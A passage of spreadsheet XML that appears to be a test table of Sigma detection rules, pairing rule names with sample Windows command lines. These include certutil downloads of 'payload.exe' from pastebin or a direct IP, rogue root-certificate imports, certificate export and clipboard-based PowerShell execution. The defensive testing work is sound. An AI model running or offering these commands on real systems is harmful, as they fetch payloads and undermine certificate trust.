      <c r="I2435" s="43" t="n"/>
      <c r="J2435" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2435" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2436" ht="15.75" customHeight="1" s="42">
      <c r="A2436" s="43" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B2436" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_cert_susp_locations</t>
        </is>
      </c>
      <c r="C2436" s="43" t="inlineStr">
        <is>
          <t>Root Certificate Installed From Susp Locations</t>
        </is>
      </c>
      <c r="D2436" s="43" t="inlineStr">
        <is>
          <t>5f6a601c-2ecb-498b-9c33-660362323afa</t>
        </is>
      </c>
      <c r="E2436" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Import-Certificate -FilePath C:\\Windows\\TEMP\\malicious.cer -CertStoreLocation Cert:\\LocalMachine\\Root"</t>
        </is>
      </c>
      <c r="F2436" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2436" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2436" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2436" s="43" t="n"/>
      <c r="J2436" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2436" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2437" ht="15.75" customHeight="1" s="42">
      <c r="A2437" s="43" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B2437" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_cert_susp_locations</t>
        </is>
      </c>
      <c r="C2437" s="43" t="inlineStr">
        <is>
          <t>Root Certificate Installed From Susp Locations</t>
        </is>
      </c>
      <c r="D2437" s="43" t="inlineStr">
        <is>
          <t>5f6a601c-2ecb-498b-9c33-660362323afa</t>
        </is>
      </c>
      <c r="E2437" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command Import-Certificate -f C:\\Windows\\TEMP\\malicious.cer -CertStoreLocation Cert:\\LocalMachine\\Root</t>
        </is>
      </c>
      <c r="F2437" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2437" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2437" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2437" s="43" t="n"/>
      <c r="J2437" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2437" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2438" ht="15.75" customHeight="1" s="42">
      <c r="A2438" s="43" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B2438" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_cert_susp_locations</t>
        </is>
      </c>
      <c r="C2438" s="43" t="inlineStr">
        <is>
          <t>Root Certificate Installed From Susp Locations</t>
        </is>
      </c>
      <c r="D2438" s="43" t="inlineStr">
        <is>
          <t>5f6a601c-2ecb-498b-9c33-660362323afa</t>
        </is>
      </c>
      <c r="E2438" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c Import-Certificate -FilePath C:\\Windows\\TEMP\\malicious.cer -CertStoreLocation Cert:\\LocalMachine\\Root</t>
        </is>
      </c>
      <c r="F2438" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2438" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2438" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2438" s="43" t="n"/>
      <c r="J2438" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2438" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2439" ht="15.75" customHeight="1" s="42">
      <c r="A2439" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2439" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_decode</t>
        </is>
      </c>
      <c r="C2439" s="43" t="inlineStr">
        <is>
          <t>File Decoded From Base64/Hex Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2439" s="43" t="inlineStr">
        <is>
          <t>cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7</t>
        </is>
      </c>
      <c r="E2439" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -decode input.b64 output.exe</t>
        </is>
      </c>
      <c r="F2439" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2439" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2439" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2439" s="43" t="n"/>
      <c r="J2439" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2439" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2440" ht="15.75" customHeight="1" s="42">
      <c r="A2440" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2440" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_decode</t>
        </is>
      </c>
      <c r="C2440" s="43" t="inlineStr">
        <is>
          <t>File Decoded From Base64/Hex Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2440" s="43" t="inlineStr">
        <is>
          <t>cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7</t>
        </is>
      </c>
      <c r="E2440" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -decode input.b64 output.exe"</t>
        </is>
      </c>
      <c r="F2440" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2440" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2440" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2440" s="43" t="n"/>
      <c r="J2440" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2440" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2441" ht="15.75" customHeight="1" s="42">
      <c r="A2441" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2441" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_decode</t>
        </is>
      </c>
      <c r="C2441" s="43" t="inlineStr">
        <is>
          <t>File Decoded From Base64/Hex Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2441" s="43" t="inlineStr">
        <is>
          <t>cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7</t>
        </is>
      </c>
      <c r="E2441" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -decode input.b64 output.exe\</t>
        </is>
      </c>
      <c r="F2441" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2441" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2441" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2441" s="43" t="n"/>
      <c r="J2441" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2441" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2442" ht="15.75" customHeight="1" s="42">
      <c r="A2442" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2442" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_decode</t>
        </is>
      </c>
      <c r="C2442" s="43" t="inlineStr">
        <is>
          <t>File Decoded From Base64/Hex Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2442" s="43" t="inlineStr">
        <is>
          <t>cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7</t>
        </is>
      </c>
      <c r="E2442" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -decode input.b64 output.exe\""</t>
        </is>
      </c>
      <c r="F2442" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2442" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2442" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2442" s="43" t="n"/>
      <c r="J2442" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2442" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2443" ht="15.75" customHeight="1" s="42">
      <c r="A2443" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2443" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C2443" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2443" s="43" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E2443" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt</t>
        </is>
      </c>
      <c r="F2443" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2443" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2443" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2443" s="43" t="n"/>
      <c r="J2443" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2443" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2444" ht="15.75" customHeight="1" s="42">
      <c r="A2444" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2444" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C2444" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2444" s="43" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E2444" s="43" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt</t>
        </is>
      </c>
      <c r="F2444" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2444" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2444" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2444" s="43" t="n"/>
      <c r="J2444" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2444" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2445" ht="15.75" customHeight="1" s="42">
      <c r="A2445" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2445" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C2445" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2445" s="43" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E2445" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -f ftmalware.exe C:\temp\malware.exe</t>
        </is>
      </c>
      <c r="F2445" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2445" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2445" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2445" s="43" t="n"/>
      <c r="J2445" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2445" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2446" ht="15.75" customHeight="1" s="42">
      <c r="A2446" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2446" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C2446" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2446" s="43" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E2446" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache" "-split -f httmalware.exe C:\temp\malware.exe</t>
        </is>
      </c>
      <c r="F2446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2446" s="43" t="n"/>
      <c r="J2446" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2446" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2447" ht="15.75" customHeight="1" s="42">
      <c r="A2447" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2447" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C2447" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2447" s="43" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E2447" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c certutil.exe -url^cache -split -f httmalware.exe C:\temp\malware.exe</t>
        </is>
      </c>
      <c r="F2447" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2447" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2447" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2447" s="43" t="n"/>
      <c r="J2447" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2447" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2448" ht="15.75" customHeight="1" s="42">
      <c r="A2448" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2448" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C2448" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2448" s="43" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E2448" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -f "http://192.0.2.1/example.txt" "C:\temp\example.txt"</t>
        </is>
      </c>
      <c r="F2448" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2448" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2448" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2448" s="43" t="n"/>
      <c r="J2448" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2448" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2449" ht="15.75" customHeight="1" s="42">
      <c r="A2449" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2449" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C2449" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2449" s="43" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E2449" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -f http://192.0.2.1/example.txt C:\temp\example.txt</t>
        </is>
      </c>
      <c r="F2449" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2449" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2449" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2449" s="43" t="n"/>
      <c r="J2449" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2449" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2450" ht="15.75" customHeight="1" s="42">
      <c r="A2450" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2450" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C2450" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2450" s="43" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E2450" s="43" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt</t>
        </is>
      </c>
      <c r="F2450" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2450" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2450" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2450" s="43" t="n"/>
      <c r="J2450" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2450" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2451" ht="15.75" customHeight="1" s="42">
      <c r="A2451" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2451" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C2451" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2451" s="43" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E2451" s="43" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f https://pastebin.com/raw/example123 C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2451" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2451" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2451" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2451" s="43" t="n"/>
      <c r="J2451" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2451" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2452" ht="15.75" customHeight="1" s="42">
      <c r="A2452" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2452" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C2452" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2452" s="43" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E2452" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -f https://cdn.discordapp.com/examplefile.txt</t>
        </is>
      </c>
      <c r="F2452" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2452" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2452" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2452" s="43" t="n"/>
      <c r="J2452" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2452" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2453" ht="15.75" customHeight="1" s="42">
      <c r="A2453" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2453" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode</t>
        </is>
      </c>
      <c r="C2453" s="43" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2453" s="43" t="inlineStr">
        <is>
          <t>e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a</t>
        </is>
      </c>
      <c r="E2453" s="43" t="inlineStr">
        <is>
          <t>certutil.exe /encode C:\Windows\System32\calc.exe C:\Users\thaim\AppData\Local\Temp\T1140_calc.txt</t>
        </is>
      </c>
      <c r="F2453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2453" s="43" t="n"/>
      <c r="J2453" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2453" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2454" ht="15.75" customHeight="1" s="42">
      <c r="A2454" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2454" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode</t>
        </is>
      </c>
      <c r="C2454" s="43" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2454" s="43" t="inlineStr">
        <is>
          <t>e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a</t>
        </is>
      </c>
      <c r="E2454" s="43" t="inlineStr">
        <is>
          <t>certutil  -encode C:\Windows\System32\calc.exe C:\Users\thaim\AppData\Local\Temp\T1140_calc.txt</t>
        </is>
      </c>
      <c r="F2454" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2454" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2454" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2454" s="43" t="n"/>
      <c r="J2454" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2454" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2455" ht="15.75" customHeight="1" s="42">
      <c r="A2455" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2455" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_extensions</t>
        </is>
      </c>
      <c r="C2455" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2455" s="43" t="inlineStr">
        <is>
          <t>ea0cdc3e-2239-4f26-a947-4e8f8224e464</t>
        </is>
      </c>
      <c r="E2455" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -encode payload.bin encoded_payload.txt</t>
        </is>
      </c>
      <c r="F2455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2455" s="43" t="n"/>
      <c r="J2455" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2455" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2456" ht="15.75" customHeight="1" s="42">
      <c r="A2456" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2456" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C2456" s="43" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2456" s="43" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E2456" s="43" t="inlineStr">
        <is>
          <t>certutil -encode C:\Windows\System32\calc.exe C:\Users\thaim\AppData\Local\Temp\T1140_calc.txt</t>
        </is>
      </c>
      <c r="F2456" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2456" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2456" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2456" s="43" t="n"/>
      <c r="J2456" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2456" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2457" ht="15.75" customHeight="1" s="42">
      <c r="A2457" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2457" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C2457" s="43" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2457" s="43" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E2457" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -encode "C:\Windows\System32\calc.exe" "C:\Users\thaim\AppData\Local\Temp\T1140_calc.txt"</t>
        </is>
      </c>
      <c r="F2457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2457" s="43" t="n"/>
      <c r="J2457" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2457" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2458" ht="15.75" customHeight="1" s="42">
      <c r="A2458" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2458" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_export_pfx</t>
        </is>
      </c>
      <c r="C2458" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2458" s="43" t="inlineStr">
        <is>
          <t>3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5</t>
        </is>
      </c>
      <c r="E2458" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -exportPFX LocalMachine C:\temp\cert.pfx</t>
        </is>
      </c>
      <c r="F2458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2458" s="43" t="n"/>
      <c r="J2458" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2458" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2459" ht="15.75" customHeight="1" s="42">
      <c r="A2459" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2459" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_export_pfx</t>
        </is>
      </c>
      <c r="C2459" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2459" s="43" t="inlineStr">
        <is>
          <t>3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5</t>
        </is>
      </c>
      <c r="E2459" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -exportPFX CurrentUser C:\temp\cert.pfx</t>
        </is>
      </c>
      <c r="F2459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2459" s="43" t="n"/>
      <c r="J2459" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2459" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2460" ht="15.75" customHeight="1" s="42">
      <c r="A2460" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2460" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C2460" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D2460" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E2460" s="43" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F2460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2460" s="43" t="n"/>
      <c r="J2460" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2460" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2461" ht="15.75" customHeight="1" s="42">
      <c r="A2461" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2461" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C2461" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D2461" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E2461" s="43" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F2461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2461" s="43" t="n"/>
      <c r="J2461" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2461" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2462" ht="15.75" customHeight="1" s="42">
      <c r="A2462" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2462" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C2462" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D2462" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E2462" s="43" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c "iex([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F2462" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2462" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2462" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2462" s="43" t="n"/>
      <c r="J2462" s="43" t="n">
        <v>3</v>
      </c>
